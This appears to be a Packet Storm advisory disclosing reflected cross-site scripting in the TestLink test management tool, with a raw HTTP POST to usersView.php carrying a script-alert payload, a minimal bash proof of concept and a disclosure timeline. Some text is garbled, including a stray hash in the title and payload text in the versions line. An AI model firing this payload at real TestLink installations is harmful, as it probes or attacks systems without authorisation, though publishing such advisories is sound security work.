Testlink TestManagement and Execution System suffers from cross site scripting vulnerabilities.
8a208e2fc273c56399bdd1d85eaf21d90d1e06ad4d3f4357aba6e056b9c2bfd11.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System.
Discovered by: Prashant Khandelwal (clickprashant@gmail.com)
2.Vulnerability Information
Class: Cross site scriping
Impact :Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerable packages.
Versions affected :All versions ">alert(726367128870)%3B
Request
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login
5. Proof Of Concept
======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@gmail.com]
# Cross site scripting in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : userView.php
echo "Please open userView.php in browser a java script alert with text 123456789 should pop up"
=====================
6. Report Timeline
I) 5-Jan-2010
Vulnerability dicovered
II) 11-Jan-2010
Notified about the vulnerability to the developer Francisco Mancardi & Martin Havlat from testlink team
IV) 11-Jan-2010
Francisco Mancardi ask for POC.
V) 14-Jan-2010
POC's given
VI) 15-Jan-2010
Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not commited any timeline for fixing the same.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Subscribe to an RSS Feed